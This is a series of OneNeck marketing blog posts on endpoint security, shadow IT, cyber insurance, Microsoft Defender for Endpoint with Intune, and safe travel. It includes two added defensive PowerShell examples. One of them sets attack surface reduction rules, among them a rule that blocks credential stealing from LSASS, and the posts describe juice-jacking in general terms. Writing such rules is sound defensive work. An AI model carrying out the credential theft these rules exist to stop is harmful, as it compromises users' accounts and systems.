In recent years, most organizations have not only changed how their employees work—with many different devices, cloud and SaaS applications—but also where they work. Employees are just as likely to work remotely as they are to be in the office. With the increase in remote and hybrid work, we’ve gone from the office to working from anywhere, including home, the local coffee shop or on an international flight. Users can be on devices and networks that you can’t control or secure.

Why Do I Need Endpoint Security?

Endpoint security helps organizations protect critical systems and sensitive data from cyberattacks like phishing, malware and ransomware. Sixty-eight percent of companies say they’ve had their data or IT infrastructure compromised through endpoint attacks. The endpoints on your network may reside outside of your office building, but they are vulnerable to attackers and frequently targeted.

Your employees may not know whether the Wi-Fi they are using right now is secure, or whether their device is running out-of-date antivirus software or an unpatched operating system, either of which increases the risk of a security vulnerability being exploited. That’s why it’s vital to have an endpoint security strategy that prevents attacks before they happen, and also detects and responds to attacks as they are happening.

How to Protect Your Assets with Endpoint Security

When your users and devices are off-network, they are the most vulnerable. Endpoint security measures protect your assets while still allowing employees easy access to your organization’s network.

Three ways to keep endpoints secure without compromising employee productivity are:

  1. Verify—Establish that your users are who they say they are before you grant them access to the network. Do this by using multi-factor authentication (MFA), so your users are required to provide a second source of validation, like a phone or a token, to verify their identity.
  2. Access—Provide a secure access point for remote workers with a Virtual Private Network (VPN). No matter where your users are, a VPN provides a secure connection to your network.
  3. Defend—No matter what actions you take, attacks are still going to happen. Be ready for the inevitable by using DNS and endpoint security to block, detect and respond to attacks before they compromise your network.

Security Starts with OneNeck

Endpoint security isn’t something to leave to chance. As malicious attacks continue to rise, protecting your remote workers and securing endpoints is your first line of defense against a network breach.

At OneNeck IT Solutions, we’ve partnered with Cisco to provide a simple, effective security solution designed for your remote workers. Cisco’s Endpoint Security solution protects your remote workers by blocking endpoint attacks and helping you respond quickly to threats. OneNeck can help you protect your network with holistic security solutions that keep pace with the ever-changing cyber landscape.

Learn more by reading about endpoint security in this helpful guide from OneNeck and Cisco, Protecting Your Endpoints the Right Way.

Demystifying Shadow IT: How to Manage Unsanctioned Technology
https://www.oneneck.com/blog/demystifying-shadow-it-and-how-to-manage/
Mon, 10 Jul 2023 13:34:45 +0000 (https://www.oneneck.com/?p=4742)

Shadow IT: you’ve probably heard the term thrown around in tech circles and IT departments. It likely conjures images of something from a spy novel. However, it is real, affecting businesses across all industries. Shadow IT refers to IT applications, solutions, services or other technology used within a company without explicit organizational approval. This unauthorized use could include a team opting for a file-sharing app or an individual downloading software not supported by the IT department.

Today, the upswing of Shadow IT stems both from the pursuit of convenience as well as the rise of generative AI. As this innovative technology becomes more accessible and widespread, employees may be tempted to utilize AI tools and applications without official approval, adding another level to the Shadow IT landscape. Ultimately, Shadow IT is a concern that most companies must address, with a recent report showing that 77% of IT Professionals believe that shadow IT is a major issue. Managing it effectively is key to organizational success.

Understanding the Appeal of Shadow IT

To effectively manage Shadow IT, it is vital to grasp why it appeals to employees in the first place. Shadow IT often emerges when employees perceive the officially approved tools and processes as cumbersome, slow or inefficient. A recent study from Beezy shows that 58% of employees aren’t satisfied with their company’s technologies. The allure of a more user-friendly tool or a platform offering greater functionality, such as generative AI tools, can be a strong incentive to bypass official channels. As these AI tools become more sophisticated and intuitive, they can seem attractive alternatives to traditional systems, further fueling their appeal.

Understanding the allure of Shadow IT also means acknowledging the resourcefulness of your employees. Faced with challenges or roadblocks, they seek solutions that enable them to do their job effectively. In the era of artificial intelligence, this might mean turning to advanced AI models like ChatGPT to streamline workflows or improve productivity. While this can pose risks when it leads to the use of unauthorized tools, it also indicates a proactive workforce. Recognizing this mindset can help channel innovative thinking toward safer, more compliant solutions.

In some cases, Shadow IT can highlight gaps or inefficiencies in current IT offerings. If a significant number of employees are turning to the same Shadow IT solution, this may indicate that existing tools aren’t fully meeting their needs. Rather than seeing this as a problem, consider it a source of important user feedback. It provides an opportunity to understand how IT offerings could be improved or expanded, thus fostering an environment of continuous improvement. By seeing Shadow IT as not just a risk but also a signal, you can better align IT strategy with employees’ actual needs, turning a potential threat into a tool for improvement.

The Risks

In many cases, Shadow IT may seem benign or, as mentioned above, a potential productivity booster, but it is critical to acknowledge its substantial risks. The most glaring risk is the potential for security breaches. Unsanctioned apps and services frequently do not adhere to the same stringent security protocols as officially approved tools. This discrepancy creates weak points in the security framework, leaving businesses vulnerable to data breaches.

Shadow IT solutions’ lack of stringent security protocols has real-world implications, the most notable being the loss of critical data. Unauthorized platforms may not be backed up properly or incorporated into an organization’s data recovery plan. Companies may suffer damages if these platforms experience a system failure or a cyber-attack, leading to significant setbacks, as lost data could include client information, sensitive employee details or even proprietary business data.

Furthermore, using Shadow IT raises serious compliance issues, especially in heavily regulated industries. Industries like healthcare, finance and education have strict security, privacy and data handling protocols. If employees are using non-approved software or services, it can inadvertently lead to compliance violations. Non-compliance can result in substantial fines, litigation costs or severe reputation damage. Shadow IT, thus, poses risks that extend far beyond immediate IT concerns, potentially impacting a business’ entire operation.

Managing Shadow IT: A Balancing Act

Managing Shadow IT isn’t about allowing a free-for-all or enforcing a strict ban; instead, it’s striking an appropriate balance:

  • Discover Existing Shadow IT– Find out what is already in use before writing policy about it. Web proxy, firewall and DNS logs, a cloud access security broker (CASB), SaaS-discovery tooling and even expense reports will reveal unsanctioned software and services. Catalog what you find, who uses it and what data flows through it.
  • Assess Risks and Benefits– After identifying Shadow IT, thoroughly assess the associated risks and benefits. Consider conducting a security review for some tools categorized as Shadow IT, as they may benefit your organization’s workflow and could potentially be officially adopted.
  • Formulate Clear IT Policies– Develop and implement a comprehensive policy that governs the use of IT resources within your organization. This policy should outline what is allowed and what isn’t. Once created, ensure these policies are effectively communicated across the organization to maintain clarity and transparency.
  • Educate and Train Your Employees– It’s crucial to ensure all employees know the risks associated with Shadow IT and the importance of adhering to the set IT policies. This is not a one-off effort. Continuously incorporate this process into your regular training schedule to keep pace with changes in policy or technology.
  • Block Questionable Applications– For any apps or services deemed a possible threat, block their usage and require employees to justify potential approval before granting the ability to download or install.
  • Monitor Regularly– Implement a regular monitoring process to check for occurrences of Shadow IT within your organization. This continuous vigilance will help enforce your IT policies and help you stay aware of the use of new tools or applications outside approved channels.
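The discovery and monitoring steps above can be started from logs most organizations already collect. As an added example that is not part of the original post, the PowerShell below groups outbound web-proxy entries by destination domain, drops everything on the sanctioned list and ranks the remainder by how many distinct users rely on them, which is exactly the "several people adopted the same tool" signal described earlier. The log lines, domain names and approved list are constructed for illustration; a real run would read a proxy, firewall, DNS or CASB export instead.

```powershell
# Added example, not OneNeck's tooling: find unsanctioned services in outbound
# web-proxy traffic and rank them by how many distinct users rely on them.
# The log lines, domains and approved list below are constructed for illustration.
$ProxyLog = @'
2024-03-01T08:01:12Z alice app.sanctioned-crm.example 443 ALLOW
2024-03-01T08:03:40Z bob files.unapproved-drive.test 443 ALLOW
2024-03-01T08:04:02Z carol files.unapproved-drive.test 443 ALLOW
2024-03-01T08:09:55Z alice files.unapproved-drive.test 443 ALLOW
2024-03-01T08:15:10Z dave notes.personal-wiki.test 443 ALLOW
2024-03-01T08:16:33Z bob app.sanctioned-crm.example 443 ALLOW
2024-03-01T08:20:07Z erin mail.example.com 443 ALLOW
'@

# Sanctioned services; in practice this comes from the application inventory.
$ApprovedDomains = @('app.sanctioned-crm.example', 'mail.example.com')

function Get-ShadowItCandidates {
    param(
        [string]$LogText,
        [string[]]$Approved,
        [int]$MinUsers = 2   # several users on one tool is a signal, one user is noise
    )
    # Parse "timestamp user domain port action" records (constructed format).
    $entries = foreach ($line in ($LogText -split "`r?`n")) {
        if ([string]::IsNullOrWhiteSpace($line)) { continue }
        $f = $line.Trim() -split '\s+'
        [pscustomobject]@{ User = $f[1]; Domain = $f[2].ToLowerInvariant() }
    }

    $entries |
        Where-Object { $_.Domain -notin $Approved } |
        Group-Object -Property Domain |
        ForEach-Object {
            $users = @($_.Group.User | Sort-Object -Unique)
            [pscustomobject]@{
                Domain      = $_.Name
                Requests    = $_.Count
                UniqueUsers = $users.Count
                Users       = ($users -join ', ')
                Verdict     = if ($users.Count -ge $MinUsers) { 'Review: unmet need?' } else { 'Individual use' }
            }
        } |
        Sort-Object -Property UniqueUsers, Requests -Descending
}

Get-ShadowItCandidates -LogText $ProxyLog -Approved $ApprovedDomains | Format-Table -AutoSize
```

On the sample data the shared file service surfaces at the top with three distinct users, which is the case worth a security review and possibly official adoption; the single-user wiki is the case policy and training address. Run against real logs, the interesting part is the trend over time, so keep the output and diff it week to week.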

How OneNeck Can Help

When appropriately managed, Shadow IT can spark growth and innovation while simultaneously mitigating risks and potential compliance issues. It’s about striking an equilibrium between security, flexibility and adapting to your employees’ needs.

Navigating the Shadow IT landscape can be challenging, but you don’t have to face this task alone. OneNeck offers services to secure, manage and transform your organization’s apps effectively. By viewing Shadow IT as an opportunity for continuous improvement and strategic advantage, we can help make sure your IT infrastructure is safe, efficient and tailored to your organization’s needs.

Contact us today to bring Shadow IT into the light and turn it from a cause for concern into a pathway toward innovation and growth.

Cybersecurity Insurance: Protecting Your Digital Assets https://www.oneneck.com/blog/cybersecurity-insurance-protecting-your-digital-assets/ Thu, 06 Jul 2023 18:23:21 +0000

Today’s workplace has ushered in a reality where safeguarding digital assets is as crucial as protecting physical ones, for organizations of every size, from small businesses to enterprises. Enter cybersecurity insurance, a specialized form of insurance designed to mitigate the financial risk associated with cyber threats. What exactly is cybersecurity insurance? Why does your business need it? And how difficult is it to obtain?

What is Cybersecurity Insurance?

The Department of Homeland Security describes cybersecurity insurance, sometimes known as cyber liability insurance, as a measure designed to mitigate losses from cyber incidents such as data breaches, business interruption, network damage and cyber extortion. Ultimately, it is a risk transfer mechanism: it allows a business to shift part of the financial risk associated with data breaches and other cyber threats to an insurer.

This insurance typically covers expenses such as breach notification, credit monitoring, the cost of defending claims brought by regulators, fines and penalties (where they are insurable), and losses resulting from identity theft. It is a safety net that helps an organization weather a cyber incident, not a substitute for the controls that prevent one.

Why Do You Need Cybersecurity Insurance?

Look at the current threat landscape to answer this question. Industry estimates put a ransomware attack on an organization every 11 seconds, rising to an attack on a consumer or business every two seconds by 2031. As companies grow more reliant on digital technology, their exposure to cyber threats grows with it.

A cyberattack can result in significant financial losses from business interruption, data recovery and reputational damage. Without a cybersecurity insurance policy, the cost of a data breach can be devastating. According to IBM’s Cost of a Data Breach study, the global average cost of a breach in 2022 was $4.35 million.

Having cybersecurity insurance provides a financial buffer, allowing businesses to recover and bounce back faster. It’s not just about managing risk – it’s about resilience.

The Cost of Coverage

Cybersecurity insurance costs differ appreciably from one company to another based on numerous factors. Still, increasing numbers of businesses of all sizes are investing in this coverage to circumvent the burden of hefty immediate expenses in a cyber crisis.

The pricing of cybersecurity insurance takes into account several critical aspects of your business, including:

  • Organizational scale and industry sector
  • Quantity of sensitive information
  • Annual earnings
  • Efficacy of existing security controls and compliance measures
  • Geographical location
  • Nature of handled data
  • Cyber incident history
  • Current risk management practices
  • Coverage limit and selected deductible
  • Use of third-party services

It is important to note that costs are rising. Cybersecurity insurance used to be relatively inexpensive, but that is no longer the case. Insurers are raising rates sharply and attaching conditions to coverage, commonly enforced multi-factor authentication, endpoint detection and response, and tested offline backups, making coverage harder, and for some organizations impossible, to obtain. Higher premiums for public and private organizations alike follow from rising demand for coverage and the growing frequency and cost of cybercrime incidents.

Cybersecurity Insurance: A Worthwhile Endeavor

Obtaining cybersecurity insurance isn’t inherently problematic, but it does require a thorough understanding of your business’s cyber risk profile. Insurance companies will often assess an organization’s cybersecurity posture before offering coverage. They consider factors such as the type of data you store, your industry sector, your company’s size, your existing cybersecurity measures, and your history of cyber incidents.

This assessment can pose a challenge for businesses without a robust cybersecurity framework. However, working with an experienced IT partner can help make this process smoother. They can assist in identifying and mitigating cyber risks, thereby improving your chances of securing suitable coverage.

In the end, while getting cybersecurity insurance might require some effort and investment, it’s a small price compared to the potential financial impact of a cyber-attack.

Securing Your Digital Future

In the digital age, cybersecurity insurance is not just an option anymore; it is a necessary part of any business risk management strategy. Just as businesses insure physical assets, it’s equally important to consider protecting digital assets. After all, in the modern workplace, a cyber-attack is not a matter of if but when.

For those who may find the process challenging, remember you do not have to navigate it alone. OneNeck is here to help guide you through the complexities of security and obtaining cybersecurity insurance. Our team has your back and will do whatever it takes to ensure your business has the protection it needs.

Contact us today and embark on your journey toward enhanced cybersecurity. Let us help you ensure a resilient business that is built for the digital challenges of today and future.

Microsoft Defender for Endpoint: A Powerful Solution https://www.oneneck.com/blog/defender-for-endpoint-solution-for-threat-defense/ Tue, 20 Jun 2023 14:25:23 +0000

In today’s interconnected digital ecosystem, fortifying endpoint devices is no longer a luxury—it’s an absolute necessity. Every work-enabled laptop, mobile device or home desktop represents a potential gateway for bad actors. This situation amplifies the need for businesses to bolster their defenses and secure every endpoint.

The expansion of the work environment has dramatically increased the number of entry points available to attackers and exposed the limits of traditional, perimeter-based security models. Protecting the new “borderless” network requires a more comprehensive approach, and endpoint security solutions have become central to it. Among them, Microsoft Defender for Endpoint® has become a strong defense against advanced threats. Microsoft’s offering has earned respect throughout the industry: Gartner has rated it a “Leader” in its Magic Quadrant for Endpoint Protection Platforms (EPP), reflecting both its ability to execute and its vision for endpoint security.

Unraveling Defender for Endpoint

Defender for Endpoint is an enterprise-grade platform designed to help businesses prevent, detect, investigate and respond to advanced threats. It showcases Microsoft’s commitment to providing wide-ranging protection for diverse digital environments. Initially exclusive to Windows, the solution now extends its security capabilities across macOS, Android and iOS mobile devices (managed by Intune) and servers powered by Windows or Linux. This breadth of coverage allows businesses to achieve comprehensive protection across their entire device ecosystem.

The value of Defender for Endpoint extends beyond multi-platform coverage to a proactive approach to threat management: fortifying defenses and anticipating threats rather than only reacting after an attack. It does this through components that each address a specific part of endpoint security: asset discovery, threat and vulnerability management, attack surface reduction, next-generation protection, and endpoint detection and response.

How does Defender for Endpoint accomplish this? Behavioral sensors built into Windows 10, Windows 11 and Windows Server 2019 and later collect and process signals from the operating system, and cloud security analytics turn those behavioral signals into insights, detections and recommended responses. Older Windows Server versions and non-Windows devices are onboarded with a separately installed agent.

Defender for Endpoint Purchase Options

The platform is sold in two plans, P1 and P2, so that businesses of different sizes and scopes can match coverage to their needs. P1 is centered on prevention and forms the backbone of your endpoint security: next-generation protection, attack surface reduction, device control and manual response actions, managed centrally. A solid preventive layer shrinks the attack surface and makes it harder for an attacker to gain a foothold.

P2 adds the detection and response capabilities: endpoint detection and response (EDR), automated investigation and remediation (AIR), advanced hunting, threat analytics and core Threat and Vulnerability Management (TVM). These give security teams timely response to incidents and insight into exposed vulnerabilities. The comprehensive nature of P2 makes it the better choice for businesses that want robust, layered protection, and together the two plans let a business tailor the solution to its needs.

Integrated Security: A Unified Experience

Defender for Endpoint isn’t a standalone product—it’s an integral part of a comprehensive security ecosystem. This ecosystem approach to security is a strategic move that underlines Microsoft’s commitment to providing businesses with a holistic security solution. Instead of viewing each aspect of cybersecurity as a separate entity, Microsoft has created an interconnected suite of tools where each component plays a critical role in maintaining the overall security posture of an organization.

One of the key strengths is the integration of Microsoft Defender for Endpoint with other Microsoft solutions: Microsoft Defender for Cloud, Microsoft Sentinel, Intune/Microsoft Endpoint Manager, Microsoft Defender for Cloud Apps, Microsoft Defender for Identity and Microsoft Defender for Office 365. This integration gives a consistent security experience across the Microsoft stack, simplifies the management of security policy and improves threat detection and response. By connecting these tools, Microsoft provides a unified platform for security tasks ranging from endpoint protection to cloud security.

With a unified security experience, IT teams can easily navigate between different tools within the Microsoft suite, significantly reducing the time and effort spent on managing security protocols. Furthermore, the integration allows for more efficient threat intelligence and response strategies sharing across different tools. This means that a threat detected by one tool can be quickly communicated to the rest, facilitating a rapid and coordinated response. Defender for Endpoint plays a central role in fortifying businesses against a complex landscape of cyber threats through this comprehensive and interconnected approach.

The Components: A Closer Look

Defender for Endpoint isn’t just a single, one-size-fits-all solution. Instead, it’s a carefully assembled collection of components, each with its unique function, designed to bolster your overall endpoint security. Like puzzle pieces, these elements work together, creating a comprehensive, multi-angle approach to security. Some of the most important aspects include:

  • Next-Generation Protection (NGP)– Going beyond the traditional MS Defender Antivirus measures, NGP provides robust real-time protection against sophisticated malware and zero-day exploits. Additionally, cloud-delivered protection delivers near-instant detection and blocking of new and emerging threats.
  • Attack Surface Reduction (ASR)– Minimizes the potential entry points for threats, making it harder for attackers to infiltrate your systems. It’s a proactive measure to keep threats at bay via components such as ASR rules that target suspicious software behavior, hardware-based isolation, controlled folder access and device control removable storage protection.
  • Endpoint Detection & Response– EDR uses machine learning, behavioral analysis and threat intelligence to provide real-time visibility into endpoint activity, identification and detection of abnormal activities or potential dangers and rapid response to minimize the impact of an attack.
  • Automated Investigation and Remediation–AIR uses AI and machine learning to streamline the investigation of alerts, identify causes of potential threats and can then take remediation actions to contain an infected device or quarantine malicious files, thus automating tasks that typically require human intervention.
  • Comprehensive Reporting and Alerting– Provides comprehensive reporting and alerting capabilities that give crucial visibility into an organization’s security posture and enable rapid response to potential threats.
  • Microsoft Secure Score for Devices– This powerful tool helps organizations assess their security posture and identify areas where proactive improvements can be made to security defenses.
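The attack surface reduction rules listed above are the component most often rolled out by hand, and the usual mistake is switching them straight to block mode on devices whose line-of-business software was never tested against them. The PowerShell below is an added example, not code from OneNeck or Microsoft: it enables a small set of ASR rules in audit mode, shows how to read the audit events they produce, and only then moves to enforcement. The rule GUIDs are Microsoft’s published identifiers for the named rules; run it in an elevated session on a Windows 10/11 or Windows Server host where Microsoft Defender Antivirus is active.

```powershell
# Added example (not OneNeck's or Microsoft's code): stage Defender ASR rules
# in audit mode, review what they would have blocked, then enforce them.
# Requires an elevated session and an active Microsoft Defender Antivirus.

# Rule names and GUIDs as published by Microsoft for attack surface reduction.
$AsrRules = @{
    'Block credential stealing from LSASS'                        = '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2'
    'Block all Office applications from creating child processes' = 'd4f940ab-401b-4efc-aadc-ad5f3c50688a'
    'Block executable content from email client and webmail'      = 'be9ba2d9-53ea-4cdc-84e5-9b1eeee46550'
    'Block Office applications from creating executable content'  = '3b576869-a4ec-4529-8536-b80a7769e899'
}

# Numeric action codes returned by Get-MpPreference and their names.
$ActionNames = @{ 0 = 'Disabled'; 1 = 'Enabled'; 2 = 'AuditMode'; 6 = 'Warn' }

function Set-AsrRuleSet {
    param(
        [hashtable]$Rules,
        [ValidateSet('AuditMode', 'Enabled', 'Disabled', 'Warn')]
        [string]$Action
    )
    foreach ($name in $Rules.Keys) {
        # Add-MpPreference appends to (or updates the action of) the rule list.
        # Set-MpPreference with -AttackSurfaceReductionRules_Ids REPLACES the whole
        # list and would silently drop any rule configured earlier.
        $params = @{
            AttackSurfaceReductionRules_Ids     = $Rules[$name]
            AttackSurfaceReductionRules_Actions = $Action
        }
        Add-MpPreference @params
        Write-Host ('{0,-10} {1}' -f $Action, $name)
    }
}

function Get-AsrRuleState {
    # Ids and Actions are parallel arrays on the preference object.
    $pref = Get-MpPreference
    $ids  = @($pref.AttackSurfaceReductionRules_Ids)
    $acts = @($pref.AttackSurfaceReductionRules_Actions)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        $code  = [int]$acts[$i]
        $label = if ($ActionNames.ContainsKey($code)) { $ActionNames[$code] } else { "Unknown($code)" }
        [pscustomobject]@{ RuleId = $ids[$i]; Action = $label }
    }
}

function Get-AsrAuditEvents {
    param([int]$Max = 25)
    # Event 1122 = rule matched in audit mode (1121 = blocked in block mode).
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Windows Defender/Operational'
        Id      = 1122
    } -MaxEvents $Max -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Message
}

# Phase 1: audit, then let the rules run in production for a while.
Set-AsrRuleSet -Rules $AsrRules -Action AuditMode
Get-AsrRuleState | Format-Table -AutoSize

# Phase 2: review the audit hits. Anything legitimate here needs an exclusion
# (Add-MpPreference -AttackSurfaceReductionOnlyExclusions <path>) before enforcement.
Get-AsrAuditEvents | Format-List

# Phase 3: enforce once the audit log is clean.
# Set-AsrRuleSet -Rules $AsrRules -Action Enabled
```

Two caveats a practitioner will hit. First, Set-MpPreference -AttackSurfaceReductionRules_Ids replaces the entire rule list, so a later Set call from another script or admin silently removes rules set earlier; use Add-MpPreference to append and Get-AsrRuleState (or Get-MpPreference directly) to verify. Second, on devices where Intune or Group Policy manages ASR, local changes are overwritten at the next policy refresh, so the same audit-then-enforce sequence should be done in the Intune endpoint security ASR profile rather than on the host.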

OneNeck and Microsoft: An Investment in Security

In an era defined by digital transformations, ensuring the security of endpoint devices is paramount. Defender for Endpoint stands as a powerful ally in this endeavor. Its wide-ranging compatibility across different operating systems and seamless integration with a host of Microsoft solutions make it a vital part of a comprehensive security strategy.

Ready to enhance your organization’s digital security posture? As an experienced Microsoft Cloud Solution Provider (CSP), OneNeck possesses extensive knowledge of Microsoft Defender for Endpoint and the Microsoft ecosystem. Our team can help you harness the power of these advanced tools, tailoring them to meet your specific needs. Don’t wait for a security breach to take action. Contact our team today!

Boost Endpoint Protection with Microsoft Defender for Endpoint and Intune https://www.oneneck.com/blog/boost-endpoint-protection-with-microsoft-defender-for-endpoint-and-intune/ Thu, 08 Jun 2023 17:16:28 +0000

The need for robust endpoint protection cannot be overstated. As network boundaries continue to blur with increases in remote work and the proliferation of mobile and IoT devices, endpoint protection has emerged as a critical aspect of network security. In this blog, we explore this process and examine two of Microsoft’s primary solutions: Microsoft Defender for Endpoint and Microsoft Intune.

Understanding Microsoft Defender for Endpoint

Microsoft Defender for Endpoint® is a platform designed to safeguard your organization’s endpoints: the desktops, laptops, servers and mobile devices that connect to your network. Its device discovery feature can also surface unmanaged and IoT devices on the same network, although those are inventoried rather than protected by the sensor.

Defender for Endpoint serves as a protective shield for your network by offering real-time threat detection, prevention, and response capabilities. But that’s not all it does. It also provides automated investigation capabilities, helping IT teams promptly detect and respond to threats, reducing time and resources spent on investigations.

Moreover, it facilitates threat intelligence sharing across platforms, enhancing an organization’s ability to proactively defend against potential threats. By harnessing artificial intelligence (AI) and integrating it with other security solutions, Defender for Endpoint ensures that your network remains resilient.

The Microsoft Defender Family: A Holistic Approach

The term “Microsoft Defender” often sparks confusion due to its broad scope. Contrary to what one might intuitively think, Microsoft Defender is not a single application but a family of interconnected security solutions designed to take a holistic approach to address digital protection. Given this complex arrangement, businesses often find it challenging to determine which specific product from the Defender suite best suits their needs.

While our focus here is on Defender for Endpoint, understanding what the entire MS Defender family brings to the table is important.  Some of the more prominent applications and add-ons include:

  • Microsoft Defender for Office 365– Prevents volume-based and targeted attacks, phishing, ransomware and advanced malware with its robust filtering system. It uses AI to detect malicious and suspicious content and provides capabilities for identifying, prioritizing and investigating threats across Office 365.​
  • Microsoft Defender for Identity– Monitors on-premises Active Directory signals to identify configuration weaknesses, detect identity-based attacks such as credential theft and lateral movement, and prioritize the riskiest users in an organization.
  • Microsoft 365 Defender– Microsoft’s extended detection and response (XDR) solution. It correlates threat data across endpoints, identities, email and cloud apps and presents each attack as a single incident in one portal.
  • Microsoft Defender for Cloud Apps– Acts as a cloud access security broker (CASB), providing multifunction visibility, control over data travel and sophisticated analytics. It helps organizations elevate security posture by combating cyber threats across all their cloud services​​.
  • Microsoft Defender Vulnerability Management– Bolsters security and IT personnel by filling workflow gaps, enabling prioritization and remediation of critical vulnerabilities and misconfigurations throughout an organization.

These applications work in concert, providing an integrated, multi-layered defense strategy. This interconnectivity creates a centrally managed environment where endpoint protection is integral to your network security strategy rather than an isolated, independent function.

The Role of Microsoft Intune

Microsoft Intune®, closely integrated with the Defender family, deserves special mention. Intune is a cloud-based mobile device management (MDM) and mobile application management (MAM) service that simplifies device management and establishes a secure foundation for your endpoint protection strategy.

Intune provides granular control over how devices access corporate data, allowing you to enforce compliance policies and regulate device access based on predefined rules. This ability to control device access is critical to any endpoint protection plan, as it ensures that only authorized devices are allowed to interact with your network.

In addition, Intune facilitates mobile application management, allowing you to control how corporate data is accessed and shared on mobile apps. This ability means protecting your data even when accessed from personal devices, ensuring that your business information remains secure, no matter where it’s accessed.

Interplay Between Intune and Defender for Endpoint

Intune and Defender for Endpoint are not standalone solutions; they work together to provide a comprehensive endpoint protection strategy. Intune sets the stage by establishing basic security controls and compliance policies, while Defender for Endpoint builds upon this foundation to provide advanced threat protection.

This interplay allows for an integrated and dynamic defense. Intune reports whether a device is compliant, Defender for Endpoint reports how risky it is, and the two combine: an Intune compliance policy can require a device’s Defender risk level to stay at or below a chosen threshold, and Conditional Access can then block non-compliant devices from corporate resources until the risk is remediated. Together they protect both the devices and the data they reach.

Why Organizations Need to Use Defender for Endpoint

The benefits of using Defender for Endpoint are numerous. It leverages behavioral sensors and cloud-delivered security to guard against known and unknown threats, including behavior-based detection of previously unseen (zero-day) malware, so protection does not depend on a signature existing for every new threat.

In addition to securing devices, Defender for Endpoint reduces the attack surface of applications: exploit protection and attack surface reduction rules constrain common exploitation techniques in productivity software, browsers and other frequently targeted programs. This matters because applications are often an attacker’s entry point.

Furthermore, Defender for Endpoint (Plan 2) offers advanced hunting: analysts can query the raw event data collected from endpoints to uncover intrusions that automated detections missed. This proactive approach to detection and response can significantly reduce the impact of security incidents.

Key Considerations for Implementation

First, understand Intune’s role in getting the most from Defender for Endpoint. Intune’s endpoint security policies let you manage antivirus, endpoint detection and response, attack surface reduction and firewall settings from a single view, and its security settings management mode extends those policies to devices that are onboarded to Defender for Endpoint but not enrolled in Intune.

Integrating Intune and Defender for Endpoint also provides opportunities for automation, reducing manual tasks and freeing your IT team to focus on strategic initiatives. Furthermore, the rich reporting capabilities of both solutions provide valuable insights into your security posture, helping you make informed decisions and continuously improve your endpoint protection strategy.

Strengthening Your Endpoint Protection Strategy with OneNeck and Microsoft

As digital threats evolve, so must your endpoint protection strategy. Consider how Microsoft Defender for Endpoint and Intune can enhance your approach. By proactively managing and securing your endpoints, you can protect your network, data and, ultimately, your organization. Start your journey with Microsoft Defender for Endpoint and Microsoft Intune today and step up your endpoint protection game.

As an experienced Microsoft CSP and IT security provider, OneNeck is positioned perfectly to be your trusted partner. We specialize in deploying layered security strategies that provide comprehensive protection, from the DNS layer, through the network to the endpoint. We leverage the power of Microsoft Defender for Endpoint, Microsoft Intune and other essential security tools to ensure your digital assets are well-protected.

Ready to boost your organization’s defenses? Contact us today for a personalized consultation on how Microsoft Defender for Endpoint and Microsoft Intune can protect your digital assets.

Tips for Data Security While Traveling https://www.oneneck.com/blog/tips-for-data-security-while-traveling/ Wed, 24 May 2023 18:46:43 +0000

You’ve likely come across the recent FBI warning about the risks of using public USB ports. It is a healthy reminder of the ever-present threat of attackers and the need to practice good security habits, especially when traveling. In this blog, we discuss practical tips for maintaining digital privacy and data security while traveling, whether at an airport, coffee shop, hotel or any other public setting. After all, protecting personal and business data is always a shared responsibility.

Public USB Port as a Risk to Data Security

The FBI’s caution about public USB ports centered on “juice jacking,” a technique in which an attacker modifies a public charging station, or leaves behind a tampered cable, so that it talks to the connected device over the USB data lines as well as supplying power. A compromised port or cable could then read data from the device, harvest credentials or install malware that gives the attacker remote control, monitors activity or encrypts data and demands a ransom. The attack depends on the device accepting a data connection: current iOS and Android versions default to charge-only mode and prompt before trusting a new host, so declining that prompt, or never letting it appear, closes the data path.

So, what can you do to protect yourself? The simplest defense is to carry your own power adapter and plug it into a wall outlet rather than into a USB port. This basic precaution goes a long way toward avoiding a compromised device.

When you cannot reach a wall outlet, or when traveling internationally, a USB battery pack or charging from another of your own devices with your own cable works just as well. Another option is a charge-only USB adapter or cable, sometimes called a “USB condom,” in which the data lines are physically disconnected. These are inexpensive and remove the data path entirely, whatever the port on the other end does.

One other essential note, it’s crucial to keep your device’s software up to date since outdated software is more vulnerable to attacks. Installing security patches and system updates as soon as they become available safeguards your device against known vulnerabilities.

Data Security While Traveling

It’s important to note that public USB port risks are not the only data security threats faced when traveling or in public settings. In addition to these threats, other potential risks exist, such as shoulder surfing and cyber-attacks through seemingly trustworthy Wi-Fi networks.

As a traveler or someone frequently in public settings, it is essential to be aware of these diverse risks and adopt a comprehensive approach to protecting data. These precautions include being careful about the networks you connect to, the information you share and how you handle devices in public spaces.

VPNs and Wi-Fi Security

Free Wi-Fi networks, often found in airports, hotels and coffee shops, pose significant problems. They are frequently poorly managed, which makes them attractive to attackers waiting for easy targets; they often do not protect traffic between your device and the access point; and they may require you to hand over personal information to gain access. If possible, use a personal hotspot from your mobile device instead. You control that network, which makes it far less likely that someone can intercept your traffic.

Using a virtual private network (VPN) is essential when away from home or office networks. A VPN establishes an encrypted tunnel between your device and the VPN server, so anyone on the local Wi-Fi sees only encrypted traffic to a single destination. If your employer provides a VPN or zero-trust access client, use that; otherwise choose a commercial service with a strong reputation, modern encryption and an independently audited no-logs policy. “No-logs” means the provider does not retain records of your online activity, which limits what can be exposed if the provider itself is breached or compelled to hand over data. Note that a VPN protects the connection, not the device: it does not replace patching, MFA or endpoint protection.

Privacy Screens

Physical security is also essential while traveling. You never know who might be looking over your shoulder in crowded places like airports or busy coffee shops. A skilled attacker can capture astonishing amounts of information by observing your screen.

To protect privacy, consider using a privacy screen on your devices. These screens make it difficult for others to see your screen from an angle, helping to prevent unwanted snooping. Privacy screens offer a relatively inexpensive and easily available solution that provides further security for your devices.

Protecting Sensitive Company Information

Your company’s security protocols, domain names, email addresses, applications and intellectual property are potential cyberattack targets. When traveling, it’s essential to stay vigilant in safeguarding this information, as it can be used to craft targeted attacks against your business or colleagues.

Exercise additional caution when using devices in public spaces, as cell phones with high-quality cameras can easily capture images of your screen or record conversations for later review. Always be mindful of your surroundings and take extra precautions to secure your company’s sensitive information.

Follow Company Protocols

Always follow your company’s guidelines for accessing and storing sensitive data while traveling. These procedures may include using encrypted devices or secure cloud storage services to protect your files. It’s also important to keep track of any physical documents containing sensitive information, as they can be easily lost or stolen during transit.

